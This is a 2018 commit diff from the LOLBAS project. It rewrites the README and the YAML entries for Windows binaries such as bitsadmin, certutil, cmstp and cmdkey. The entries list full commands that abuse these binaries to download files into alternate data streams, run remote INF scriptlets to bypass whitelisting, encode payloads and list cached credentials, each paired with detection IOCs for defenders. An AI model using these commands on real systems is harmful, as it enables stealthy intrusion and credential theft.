Update readme, began updating OSBins with new template

This commit is contained in:
Oddvar Moe 2018-09-24 01:50:14 +02:00
parent e8c7042468
commit adafa6de3f
17 changed files with 234 additions and 121 deletions

View File

@ -17,9 +17,10 @@ Primarily files that offer "extra" functionality.
## Definition
* Must be a Microsoft signed file. (OS or downloaded from Microsoft site)
* Must be a Microsoft signed file. (Native to the OS or downloaded from Microsoft site)
* Only extra "unexpected" functionality is interesting (Not interesting to document what it was intended for)
* Exceptions are Application Whitelisting bypasses
* Primary focus is stuff that can be leveraged by APT or in Red Teaming
* Functionality can include:
* Executing code
@ -48,14 +49,15 @@ We generate the MD files from this and later it will also be the base for an upc
## STORY
"Living off the land" was coined by Matt Graeber - @mattifestation <3
One of the first "Living Off The Land" talks (That I know of) is this one:
"Living off the land" was coined by Christopher Campbell (@obscuresec) & Matt Graeber (@mattifestation)
One of the first "Living Off The Land" talks is this one:
https://www.youtube.com/watch?v=j-r6UonEkUw
The term LOLBins came from a twitter discussion on what to call these binaries. It was first proposed by Philip Goh - @MathCasualty here:
The term LOLBins came from a twitter discussion on what to call these binaries that can be used by an attacker to perform other actions than what the binary was designed to do.
LOLBins was first proposed by Philip Goh (@MathCasualty) here:
https://twitter.com/MathCasualty/status/969174982579273728
The term LOLScripts came from Jimmy - @bohops:
The term LOLScripts came from Jimmy (@bohops):
https://twitter.com/bohops/status/984828803120881665
Common hashtags for these files are:
@ -71,7 +73,7 @@ A "highly scientific poll" was also conducted to agree (69% yes) on the name LOL
https://twitter.com/Oddvarmoe/status/985432848961343488
The domain http://lolbins.com has been registered by an unknown individual and redirected it to this project. (Thank you)
The domain http://lolbas-project.com has been registered by Jimmy (@bohops). (Thanks!)
The awesome logos in the logo folder was provided by Adam Nadrowski (@_sup_mane) - Thank you so much man!
Love this logo:
@ -82,33 +84,36 @@ Love this logo:
All features are added to the issues in this repo.
### 1.0
* Hosted https://github.com/api0cradle/LOLBAS/
* Only MD files
- [x] Hosted https://github.com/api0cradle/LOLBAS/
- [x] Only MD files
### 2.0 -- Current
* Hosted here on this repo
* Everything converted to YML files
* MD files generated from YML files
* Clearer definition
* Management scripts
- [x] Moved from api0cradle and hosted here on this repo (https://github.com/LOLBAS-Project/LOLBAS)
- [x] Everything converted to YML files
- [x] MD files generated from YML files
- [x] Clearer definition of a LOLBin
- [ ] Management scripts
- [x] New template
### 2.1
* More categories
* Jekyll frontend
* Privileges required
- [ ] Migration to new template
- [ ] More categories - Part of the new template
- [ ] ATT&CK Mitre mapping
- [ ] Privileges required by binary
- [ ] Jekyll frontend
### 2.2
* ATT&CK Mitre mapping
* LOLBIN GUID - Unique ID for each bin
* Sub-Categories
* Signed executing unsigned
* Signed executing signed
* Split commands into command, argument structure, and example. i.e. Command: cmstp.exe; ArgStructure: /ini /s <inf_file>; Example: cmstp.exe /ini /s c:\cmstp\CorpVPN.inf
- [ ] LOLBIN GUID - Unique ID for each bin
- [ ]Sub-Categories
- [ ] Signed executing unsigned
- [ ] Signed executing signed
- [ ] Split commands into command, argument structure, and example. i.e. Command: cmstp.exe; ArgStructure: /ini /s <inf_file>; Example: cmstp.exe /ini /s c:\cmstp\CorpVPN.inf
### 2.3
* Tests for PRs to ensure fields are valid
* Provide the project in DB format (sqlite)
- [ ] Tests for PRs to ensure fields are valid
- [ ]Provide the project in DB format (sqlite)

View File

@ -1,20 +1,29 @@
---
Name: Atbroker.exe
Description: Execute
Author: ''
Description: Helper binary for Assistive Technology (AT)
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: ATBroker.exe /start malware
Description: Start a registered Assistive Technology (AT).
Usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\System32\Atbroker.exe
- C:\Windows\SysWOW64\Atbroker.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\Atbroker.exe
- path: C:\Windows\SysWOW64\Atbroker.exe
Code Sample:
- Code:
Detection:
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
Resources:
- http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
Notes: >
Thanks to Adam - @hexacorn
Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry.
- Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
Acknowledgement:
- Person: Adam
Handle: '@hexacorn'
---

View File

@ -1,17 +1,35 @@
---
Name: Bash.exe
Description: Execute
Author: ''
Description: File used by Windows subsystem for Linux
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: bash.exe -c calc.exe
Description: Execute calc.exe.
Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
- Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
Full Path:
- '?'
Code Sample: []
Detection: []
- path: C:\Windows\System32\bash.exe
- path: C:\Windows\SysWOW64\bash.exe
Code Sample:
- Code:
Detection:
- IOC: Child process from bash.exe
Resources:
- ''
Notes: Thanks to ?
- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
Acknowledgement:
- Person: Alex Ionescu
Handle: '@aionescu'
---

View File

@ -1,36 +1,59 @@
---
Name: Bitsadmin.exe
Description: Execute, Download, Copy, Read ADS
Author: ''
Name: bitsadmin.exe
Description: Used for managing background intelligent transfer
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: |
bitsadmin /create 1
bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe
bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL
bitsadmin /RESUME 1
bitsadmin /complete 1
- Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
- Command: |
bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1
- Command: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job.
Usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique.
Category: Alternate data streams
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
Description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
Description: One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
Description: One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset
Description: Command for copying cmd.exe to another folder
Usecase: Copy file
Category: Copy
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
Description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.
Usecase: Execute binary file specified. Can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\Windows\System32\bitsadmin.exe
- c:\Windows\SysWOW64\bitsadmin.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\bitsadmin.exe
- path: C:\Windows\SysWOW64\bitsadmin.exe
Code Sample:
- Code:
Detection:
- IOC: Child process from bitsadmin.exe
- IOC: bitsadmin creates new files
- IOC: bitsadmin adds data to alternate data stream
Resources:
- https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679
- Slide 53
- https://www.youtube.com/watch?v=_8xJaaQlpBo
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe
- Link: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
- Link: https://www.youtube.com/watch?v=_8xJaaQlpBo
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
- Person: Rob Fuller
Handle: '@mubix'
- Person: Chris Gates
Handle: '@carnal0wnage'
- Person: Oddvar Moe
Handle: '@oddvarmoe'
---

View File

@ -1,25 +1,56 @@
---
Name: Certutil.exe
Description: Download, Add ADS, Decode, Encode
Author: ''
Description: Windows binary used for handeling certificates
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Description: Download and save 7zip to disk in the current folder.
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Description: Download and save a PS1 file to an Alternate Data Stream (ADS).
- Command: |
certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName
Description: Commands to encode and decode a file using Base64.
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Category: Alternate data streams
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil -encode inputFileName encodedOutputFileName
Description: Command to encode a file using Base64
Usecase: Encode files to evade defensive measures
Category: Encode
Privileges: User
MitreID: T1027
MitreLink: https://attack.mitre.org/wiki/Technique/T1027
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil -decode encodedInputFileName decodedOutputFileName
Description: Command to decode a Base64 encoded file.
Usecase: Decode files to evade defensive measures
Category: Decode
Privileges: User
MitreID: T1140
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\certutil.exe
- c:\windows\sysWOW64\certutil.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\certutil.exe
- path: C:\Windows\SysWOW64\certutil.exe
Code Sample:
- Code:
Detection:
- IOC: Certutil.exe creating new files on disk
- IOC: Useragent Microsoft-CryptoAPI/10.0
- IOC: Useragent CertUtil URL Agent
Resources:
- https://twitter.com/Moriarty_Meng/status/984380793383370752
- https://twitter.com/mattifestation/status/620107926288515072
Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016
- Link: https://twitter.com/Moriarty_Meng/status/984380793383370752
- Link: https://twitter.com/mattifestation/status/620107926288515072
Acknowledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
- Person: Moriarty
Handle: '@moriarty2016'
---

View File

@ -1,18 +1,28 @@
---
Name: Cmdkey.exe
Description: Credentials
Author: ''
Name: Cmdkey.exe
Description: creates, lists, and deletes stored user names and passwords or credentials.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: cmdkey /list
Description: List cached credentials.
Description: List cached credentials
Usecase: Get credential information from host
Category: Credentials
Privileges: User
MitreID: T1078
MitreLink: https://attack.mitre.org/wiki/Technique/T1078
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- c:\windows\system32\cmdkey.exe
- c:\windows\sysWOW64\cmdkey.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\cmdkey.exe
- path: C:\Windows\SysWOW64\cmdkey.exe
Code Sample:
- Code:
Detection:
- IOC: Usage of this command could be and IOC
Resources:
- https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
Notes: ''
- Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
Acknowledgement:
- Person:
Handle:
---

View File

@ -1,26 +1,43 @@
---
Name: Cmstp.exe
Description: Execute, UACBypass
Author: ''
Description: Installs or removes a Connection Manager service profile.
Author: 'Oddvar Moe'
Created: '2018-05-25'
Categories: []
Commands:
- Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet.
Category: Execute
Privileges: User
MitreID: T1191
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
Category: AwL bypass
Privileges: User
MitreID: T1191
MitreLink: https://attack.mitre.org/wiki/Technique/T1191
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full Path:
- C:\Windows\system32\cmstp.exe
- C:\Windows\sysWOW64\cmstp.exe
Code Sample: []
Detection: []
- path: C:\Windows\System32\cmstp.exe
- path: C:\Windows\SysWOW64\cmstp.exe
Code Sample:
- Code:
Detection:
- IOC: Execution of cmstp.exe should not be normal unless VPN is in use
- IOC: Cmstp.exe communication towards internet and getting files
Resources:
- https://twitter.com/NickTyrer/status/958450014111633408
- https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
- https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
- https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
- https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
(UAC Bypass)
- https://github.com/hfiref0x/UACME
Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer
- Link: https://twitter.com/NickTyrer/status/958450014111633408
- Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80
- Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e
- Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/
- Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
- Person: Nick Tyrer
Handle: '@NickTyrer'
---